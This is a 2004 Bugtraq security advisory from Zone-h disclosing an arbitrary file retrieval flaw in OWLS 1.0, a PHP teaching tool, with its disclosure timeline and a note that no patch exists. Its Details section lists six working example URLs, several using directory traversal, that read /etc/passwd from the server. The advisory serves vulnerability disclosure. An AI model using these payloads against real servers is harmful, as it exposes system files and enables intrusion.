From zetalabs@zone-h.org Wed Feb 18 15:53:49 2004 From: ZetaLabs To: bugtraq@securityfocus.com Date: 18 Feb 2004 09:14:59 -0000 Subject: ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving ZH2004-08SA (security advisory): OWLS 1.0 Remote arbitrary files retrieving Discovered: 05 january 2004 Vendor contacted: 07 january 2004 Published: 18 february 2004 Name: OWLS Affected Systems: 1.0 Issue: Remote file retrieving Author: G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org Vendor: http://www.foolsworkshop.com/owls/ Description *********** Zone-h Security Team has discovered a flaw in OWLS 1.0. There is a vulnerability in the current version of OWLS that allows an attacker to retrieve arbitrary files from the webserver with its priviledges. "OWLS is a web-based environment for instructors of language to easily create exercises, readings, glossaries, and present media for their students. Once installed on a web server that supports PHP, instructors can create materials or upload media for presentation to their students through a simple form based interface" Details ******* It's possibile for a remote attacker to retrieve any file from a webserver. Multiple files are affected with this problem. For example try this: http://address/owls/glossaries/index.php?file=/etc/passwd http://address/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print http://address/owls/readings/index.php?filename=/etc/passwd http://address/owls/multiplechoice/resultsignore.php?filename=/etc/passwd http://address/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd http://address/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd Solution: ********* The vendor has been contacted and a patch was not yet produced. G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org http://www.zone-h.org/en/advisories/read/id=3973/